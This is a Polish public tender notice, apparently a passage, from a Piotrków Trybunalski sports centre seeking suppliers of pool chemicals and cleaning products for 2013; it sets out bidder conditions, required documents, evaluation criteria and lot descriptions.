<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa wart. 22 ust. 1 ustawy należy przedłożyć:
a)	Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 w związku z art. 22 ust. 1 (dotyczy Części 1,2,3,4,5).
Przy dokonaniu oceny spełnianiu warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem uczestnictwa w postępowaniu jest przedłożenie:
a) Wykazu należycie wykonanego co najmniej jednego zamówienia o podobnej wartości  i odpowiadającego rodzajem przedmiotowi niniejszego zamówienia (dotyczy Części 1,2,3,4,5) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie. Do ofert należy dołączyć  referencje od poprzednich Zamawiających ze szczególnym uwzględnieniem terminowości dostaw, potwierdzenia jakości dostarczanej chemii, środków lub  produktów i  wartości całości zamówienia (dotyczy Części 1,2,3,4,5).
W przypadku składania oferty przez wykonawców, ubiegających się wspólnie o udzielenie zamówienia, wykaz może być złożony wspólnie lub oddzielnie przez wykonawców.
Przy dokonaniu oceny spełnianiu warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem uczestnictwa w postępowaniu jest przedłożenie:
a)	oświadczenia Wykonawcy, że transport  chemii do uzdatniania wody basenowej odbywał się będzie samochodem przystosowanym do przewozu niebezpiecznych substancji chemicznych (dotyczy tylko Części 1).
Przy dokonaniu oceny spełnianiu warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem uczestnictwa w postępowaniu jest przedłożenie:
a) oświadczenia Wykonawcy, że kierowca dostarczający chemię do uzdatniania wody basenowej posiada wymagane pozwolenie ADR uprawniające go do przewozu niebezpiecznych substancji chemicznych (dotyczy tylko Części 1);
Przy dokonaniu oceny spełnianiu warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem uczestnictwa w postępowaniu jest przedłożenie:
a) potwierdzoną za zgodność z oryginałem kopię opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej przedmiotem zamówienia  na wartość co najmniej 100.000 PLN (dotyczy tylko Części 1). 
Przy dokonaniu oceny spełnianiu warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Formularz Ofertowy (dotyczy Części 1,2,3,4,5),
b) Kosztorys Ofertowy (dotyczy Części 1,2,3,4,5),
c) Karty charakterystyki wszystkich substancji lub ich kopie potwierdzone przez Wykonawcę  za zgodność z oryginałem (dotyczy Części 1,2,4,5),
d) Pozwolenie na obrót preparatami biobójczymi lub ich kopie potwierdzone przez Wykonawcę   za zgodność oryginałem (dotyczy Części 1),
e) Oświadczenie Wykonawcy o terminie dostarczenia chemii, produktów i środków czystości (dotyczy Części 1,2,3,4,5),
f) Wykonawcy  korzystający  z Podwykonawców,  zobowiązani  są  wraz  z ofertą  dostarczyć:
- Oświadczenie Podwykonawcy o braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 i 1a) oraz ust. 2 (dotyczy Części 1,2,3,4,5),
- .Oświadczenie Podwykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 w związku z art. 22 ust. 1. (dotyczy Części 1,2,3,4,5),
- Aktualny odpis z właściwego rejestru , jeżeli odrębne  przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy - dla Podwykonawcy (dotyczy Części 1,2,3,4,5),
g)	Jeżeli Wykonawca polega na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków, na zasadach określonych w art. 26 ust. 2b ustawy, to w takim przypadku Wykonawca zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności składając w tym celu pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, podpisane przez osoby upoważnione do reprezentacji tych podmiotów (dotyczy Części 1,2,3,4,5).
Przy dokonaniu oceny spełnianiu warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Termin realizacji każdorazowej dostawy - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy będą mogły nastąpić w następujących okolicznościach:
a)	zaistnienia,  po  zawarciu umowy,  przypadku  siły wyższej,  przez którą,  na potrzeby niniejszego warunku rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
- o charakterze niezależnym od stron,
- którego strony nie mogły przewidzieć przed zawarciem umowy,
- którego nie można uniknąć, ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności,
- której nie można przypisać drugiej stronie;
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia;
b)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron;
c)	powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie   rozbieżności   i   doprecyzowanie   umowy   w   celu   jednoznacznej interpretacji jej zapisów przez strony;
d)	dopuszcza się zmianę stawki VAT w razie ustawowej zmiany przepisów o VAT, stosownie do zmian dokonywanych w tym zakresie,
e)	gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - zmiana dotyczy w szczególności terminu realizacji .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.osirpt.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Sportu i Rekreacji
Al. 3 Maja 6 B 
97 - 300 Piotrków Trybunalski
pokój 315.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.01.2013 godzina 10:00, miejsce: Ośrodek Sportu i Rekreacji
Al. 3 Maja 6 B 
97 - 300 Piotrków Trybunalski
pokój 301.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> SUKCESYWNA DOSTAWA ŚRODKÓW CHEMICZNYCH DO UZDATNIANIA WODY BASENOWEJ DLA POTRZEB  KRYTYCH PŁYWALNI MIESZCZĄCYCH SIĘ PRZY ULICACH BELZACKIEJ 106 I  PRÓCHNIKA 8/12 OŚRODKA SPORTU I REKREACJI W PIOTRKOWIE TRYBUNALSKIM..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Całkowite zapotrzebowanie na  dostawę środków chemicznych  do uzdatniania wody basenowej (zwanych dalej środkami chemii basenowej) dla potrzeb Krytych Pływalni przy ul. Belzackiej 106 i ul. Próchnika 8/12 przedstawia Kosztorys Ofertowy 
2. Środki chemii basenowej winny  posiadać własności chemiczne gwarantujące wysoką jakość i spełnienie obowiązujących norm. 
3. Dostawę środków chemii basenowej należy realizować po zgłoszeniu telefonicznym potwierdzonym faxem lub e-mailem przez uprawnionego pracownika ze strony Zamawiającego.  
4. Termin każdorazowej dostawy środków chemii basenowej nie może przekroczyć 24 godzin od momentu otrzymania zlecenia. Dostawy odbywać się będą w godzinach pracy Zamawiającego przy czym godzina dostawy ma być każdorazowo ustalana z upoważnionym pracownikiem Zamawiającego. 5. Każdy ze środków chemii basenowej winien spełniać te same właściwości chemiczne czy fizykochemiczne, które podano w Kosztorysie Ofertowym Część 1.
6. W przypadku wątpliwości co do jakości środków chemii basenowej Zamawiający zleci wykonanie badań środków chemii basenowej w uprawnionym laboratorium. W razie stwierdzenia niezgodności z obowiązującymi normami kosztami badania laboratoryjnego zostanie obciążony Wykonawca dostawy środków chemii basenowej. 7. Wykonawca  poniesie koszty wymiany wody w nieckach basenowych  w przypadku, gdy zostanie stwierdzona niezgodność dostarczonych i użytych środków chemii basenowej z obowiązującymi w tym zakresie normami. 
8. W przypadku, gdy Zamawiający zmuszony zostanie do zamknięcia Krytej Pływalni przy ul. Belzackiej 106 i (lub) przy ul. Próchnika 8/12 z winy leżącej po stronie Wykonawcy,  m.in. z powodu opóźnienia w dostawie środków chemii basenowej lub dostarczenia środków chemii basenowej o złej jakość, to Wykonawca  zapłaci karę za każdy dzień przestoju z tytułu utraconych korzyści przez Zamawiającego (z tytułu świadczenia usług oferowanych przez Zamawiającego na obiektach Krytych Pływalni) w wysokości określonej w § 5 istotnych postanowieniach umowy. 
9. Podane w Kosztorysie Ofertowym Część 1 ilości są wielkościami maksymalnymi, założonymi do zamówienia, ich dostawa następowała będzie częściami, na podstawie zamówień częściowych Zamawiającego, w oparciu o bieżące potrzeby Zamawiającego i wg cen jednostkowych podanych w Kosztorysie Ofertowym Część 1 będącym załącznikiem  nr 2 do  umowy, które są niezmienne przez cały okres obowiązywania umowy. 
10. Wykonawcy nie przysługuje wobec Zamawiającego roszczenie odszkodowawcze z tytułu dostarczenia mniejszej ilości środków chemii basenowej, w stosunku do tego, co zostało określone w Kosztorysie Ofertowym Część  1, określającym ilości środków chemii basenowej oraz ceny jednostkowe. 
11. Dostawa, transport i rozładunek środków chemii basenowej odbywać się będzie na koszt i ryzyko Wykonawcy do obiektów Zamawiającego:   
- Kryta Pływalnia przy ul. Belzackiej 106 w Piotrkowie Trybunalskim,    
- Kryta Pływalnia przy ul. Próchnika 8/12 w Piotrkowie Trybunalskim, 
12. Wykonawca zobowiązuje się dostarczyć środki chemii basenowej jako produkty nowe w oryginalnych, fabrycznie zamkniętych opakowaniach, w pojemnikach o maksymalnym ciężarze 25 kg, przystosowanych do transportu i przechowywania chemikaliów, z etykietami w języku polskim, z minimum 3 miesięcznym okresem przydatności do zużycia od daty dostawy, posiadający świadectwo jakości producenta. 
13. Wykonawca zobowiązany jest posiadać w okresie realizacji umowy aktualne, wymagane prawem atesty higieniczne, pozwolenia czy instrukcje dopuszczające zaoferowane środki chemii basenowej do powszechnego użytku. 
14. Wykonawca ponosi pełną odpowiedzialność za jakość wykonanej dostawy, jej kompletność i zgodność z zamówieniem oraz za szkody poniesione przez Zamawiającego lub osoby trzecie, a będące następstwem niedotrzymania terminów dostawy, właściwości i jakości dostarczonych środków chemii basenowej.  
WYKONAWCA DOSTAWY: 
1. zapewni dostawę środków chemii basenowej, która winna  posiadać własności chemiczne  gwarantujące odpowiednią jakość i spełnianie obowiązujących norm, 
2. wraz z dokumentami potwierdzającymi spełnianie warunków udziału w postępowaniu złoży karty charakterystyki każdego środka chemii basenowej oraz pozwolenie na obrót preparatami biobójczymi lub ich kopie potwierdzone przez Wykonawcę za zgodność z oryginałem, 
3. umożliwi regulowanie należności w formie bezgotówkowej, w terminie 30 dni od daty otrzymania prawidłowo wystawionej faktury VAT,  
4. do każdorazowej dostawy środków chemii basenowej Wykonawca dostarczy dowód W-Z, który zostanie podpisany przez pracowników Wykonawcy i Zamawiającego,
5. przedstawi wykaz wykonanej w ciągu ostatnich trzech lat min 1 dostawy o wartości równej lub powyżej 66.000,00 zł i o podobnym charakterze do przedmiotu zamówienia. Do ofert należy dołączyć  referencje od poprzednich Zamawiających ze szczególnym uwzględnieniem terminowości dostaw, potwierdzenia jakości dostarczanych środków chemii basenowej i wartości całości zamówienia, 
6. wymaganym jest, aby kierowca posiadał pozwolenie ADR uprawniające go do przewozu niebezpiecznych środków, 
7. wymaganym jest, aby transport środków chemii basenowej odbywał się samochodem przystosowanym do przewozu niebezpiecznych substancji chemicznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.96.20.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Termin realizacji każdorazowej dostawy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> SUKCESYWNA DOSTAWA ŚRODKÓW CHEMICZNYCH DO  UTRZYMANIA CZYSTOŚCI POMIESZCZEŃ MOKRYCH -  SZATNI,  NATRYSKÓW, SANITARIATÓW   W OBIEKTACH OŚRODKA SPORTU I REKREACJI W PIOTRKOWIE TRYBUNALSKIM..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Całkowite zapotrzebowanie na  środki chemiczne do utrzymania czystości pomieszczeń mokrych - szatni, natrysków, sanitariatów (zwanych dalej środkami chemicznymi) przedstawia Kosztorys Ofertowy Część 2. 
2. Środki chemiczne winny  posiadać własności chemiczne gwarantujące wysoką jakość, spełnienie obowiązujących norm i ulegać biodegradacji. 
3. Dostawę środków chemicznych należy realizować po zgłoszeniu telefonicznym potwierdzonym faxem lub e-mailem przez uprawnionego pracownika ze strony Zamawiającego.  
4. Termin każdorazowej dostawy środków chemicznych nie może przekroczyć 24 godzin od momentu otrzymania zlecenia. Dostawy odbywać się będą w godzinach pracy Zamawiającego przy czym godzina dostawy ma być każdorazowo ustalana z upoważnionym pracownikiem Zamawiającego. 
5. Każdy ze środków chemicznych winien spełniać te same właściwości chemiczne czy fizykochemiczne, które podano w Kosztorysie Ofertowym Część 2. 
6. Podane w Kosztorysie Ofertowym Część 2 ilości są wielkościami maksymalnymi, założonymi do zamówienia, ich dostawa następowała będzie częściami, na podstawie zamówień częściowych Zamawiającego, w oparciu o bieżące potrzeby Zamawiającego i wg cen jednostkowych podanych w Kosztorysie Ofertowym Część 2 będącym załącznikiem Nr 2 do umowy, które są niezmienne przez cały okres obowiązywania umowy. 
7. Wykonawcy nie przysługuje wobec Zamawiającego roszczenie odszkodowawcze z tytułu dostarczenia mniejszej ilości środków chemicznych, w stosunku do tego, co zostało określone w Kosztorysie Ofertowym Część 2, określającym ilości środków chemicznych oraz ceny jednostkowe. 
8.  Dostawa, transport i rozładunek środków chemicznych odbywać się będzie, do obiektu Zamawiającego - Kryta Pływalnia przy ul. Belzackiej 106 w Piotrkowie Trybunalskim na koszt i ryzyko Wykonawcy. 
9. Wykonawca zobowiązuje się dostarczyć środki chemiczne jako produkty nowe, w oryginalnych, fabrycznie zamkniętych  opakowaniach, w pojemnikach przystosowanych do transportu i przechowywania chemikaliów, z etykietami w języku polskim, z minimum 3 miesięcznym okresem przydatności do zużycia od daty dostawy, posiadający świadectwo jakości producenta. 
10. Wykonawca zobowiązany jest posiadać w okresie realizacji umowy aktualne, wymagane prawem atesty higieniczne, pozwolenia czy instrukcje dopuszczające zaoferowane środki chemiczne do powszechnego użytku. 
11.  Wykonawca ponosi pełną odpowiedzialność za jakość wykonanej dostawy, jej kompletność i zgodność z zamówieniem oraz za szkody poniesione przez Zamawiającego lub osoby trzecie, a będące następstwem niedotrzymania terminów dostawy, właściwości i jakości dostarczonych środków chemicznych.  
WYKONAWCA DOSTAWY: 
1. zapewni dostawę środków chemicznych, które winny posiadać własności chemiczne gwarantujące odpowiednią jakość i spełnianie obowiązujących norm oraz powinny ulegać całkowitej biodegradacji,  
2. wraz z dokumentami potwierdzającymi spełnianie warunków udziału w postępowaniu złoży karty charakterystyki każdego środka chemicznego lub ich kopie potwierdzone przez Wykonawcę za zgodność z oryginałem, 
3. umożliwi regulowanie należności w formie bezgotówkowej, w terminie 30 dni od daty otrzymania prawidłowo wystawionej faktury VAT,  
4.  do każdorazowej dostawy  środków chemicznych Wykonawca dostarczy  dowód W-Z, który zostanie podpisany przez pracowników Wykonawcy i Zamawiającego,
5.  przedstawi wykaz wykonanej w ciągu ostatnich trzech lat min 1 dostawy o wartości równej lub powyżej 40.000,00 zł i o podobnym charakterze do przedmiotu zamówienia. Do ofert należy dołączyć  referencje od poprzednich Zamawiających ze szczególnym uwzględnieniem terminowości dostaw,  potwierdzenia jakości dostarczanych środków chemicznych i wartości całości zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.40-0, 39.83.12.50-3, 39.83.16.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Termin realizacji każdorazowej dostawy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> SUKCESYWNA DOSTAWA PRODUKTÓW DO MYCIA OKIEN I PODŁÓG KRYTYCH PŁYWALNI MIESZCZĄCYCH SIĘ PRZY ULICACH BELZACKA 106 I PRÓCHNIKA 8/12 OŚRODKA SPORTU  I REKREACJI W PIOTRKOWIE TRYBUNALSKIM..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Całkowite zapotrzebowanie na dostawę produktów do mycia okien i podłóg (zwanych dalej produktami) w Krytych Pływalniach mieszczących się przy ulicach Belzacka 106 i Próchnika 8/12 Ośrodka Sportu i Rekreacji w Piotrkowie Trybunalskim przedstawia Kosztorys Ofertowy Część 3. 
2. Produkty winny charakteryzować  się wysoką jakością. 
3. Dostawę produktów należy realizować po zgłoszeniu telefonicznym potwierdzonym faxem lub e-mailem przez uprawnionego pracownika ze strony Zamawiającego.  
4. Termin każdorazowej dostawy produktów nie może przekroczyć 24 godzin od momentu otrzymania zlecenia. Dostawy odbywać się będą w godzinach pracy Zamawiającego przy czym godzina dostawy ma być każdorazowo ustalana z upoważnionym pracownikiem Zamawiającego. 
5. Podane w Kosztorysie Ofertowym Część 3 ilości są wielkościami maksymalnymi, założonymi do zamówienia, ich dostawa następowała będzie częściami, na podstawie zamówień częściowych Zamawiającego, w oparciu o bieżące potrzeby Zamawiającego i wg cen jednostkowych podanych w Kosztorysie Ofertowym Część 3, będącym załącznikiem Nr 2 do umowy, które są niezmienne przez cały okres obowiązywania umowy. 
6. Wykonawcy nie przysługuje wobec Zamawiającego roszczenie odszkodowawcze z tytułu dostarczenia mniejszej ilości produktów, w stosunku do tego, co zostało określone w Kosztorysie Ofertowym Część 3, określającym ilości produktów oraz ceny jednostkowe. 
7.  Dostawa, transport i rozładunek produktów odbywać się będzie, do obiektu Krytej Pływalni przy ul. Belzackiej 106 w Piotrkowie Trybunalskim na koszt i ryzyko Wykonawcy. 
8. Wykonawca zobowiązuje się dostarczyć produkty nowe, w oryginalnych opakowaniach. 
9.  Wykonawca ponosi pełną odpowiedzialność za jakość wykonanej dostawy, jej kompletność i zgodność z zamówieniem oraz za szkody poniesione przez Zamawiającego lub osoby trzecie, a będące następstwem niedotrzymania terminów dostawy, właściwości i jakości dostarczonych produktów.  
WYKONAWCA USŁUGI: 
1. dostarczy produkty odpowiedniej jakość i  spełniające obowiązujące normy,  
2. umożliwi regulowanie należności w formie bezgotówkowej, w terminie 30 dni od daty otrzymania prawidłowo wystawionej faktury VAT,  
3. do każdorazowej dostawy  produktów Wykonawca dostarczy  dowód W-Z, który zostanie podpisany przez pracowników Wykonawcy i Zamawiającego,
4. przedstawi wykaz wykonanej w ciągu ostatnich trzech lat min 1 dostawy o wartości równej lub powyżej 18.000,00 zł i o podobnym charakterze do przedmiotu zamówienia. Do ofert należy dołączyć  referencje od poprzednich Zamawiających ze szczególnym uwzględnieniem terminowości dostaw, potwierdzenia jakości dostarczanych produktów  i wartości całości zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.40.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Termin realizacji każdorazowej dostawy - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> SUKCESYWNA DOSTAWA ŚRODKÓW DO UTRZYMANIA  CZYSTOŚCI  POMIESZCZEŃ  W  OBIEKTACH  OŚRODKA  SPORTU  I  REKREACJI  W  PIOTRKOWIE  TRYBUNALSKIM..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Całkowite zapotrzebowanie na dostawę środków do utrzymania czystości pomieszczeń (zwane dalej produktami) w obiektach OSiR przedstawia Kosztorys Ofertowy Część 4. 
2. Produkty winny posiadać wysoką jakość, spełniać obowiązujące normy i ulegać biodegradacji. 
3. Dostawę produktów należy realizować po zgłoszeniu telefonicznym potwierdzonym faxem lub e-mailem przez uprawnionego pracownika ze strony Zamawiającego.  
4. Termin każdorazowej dostawy produktów nie może przekroczyć 24 godzin od momentu otrzymania zlecenia. Dostawy odbywać się będą w godzinach pracy Zamawiającego przy czym godzina dostawy ma być każdorazowo ustalana z upoważnionym pracownikiem Zamawiającego. 
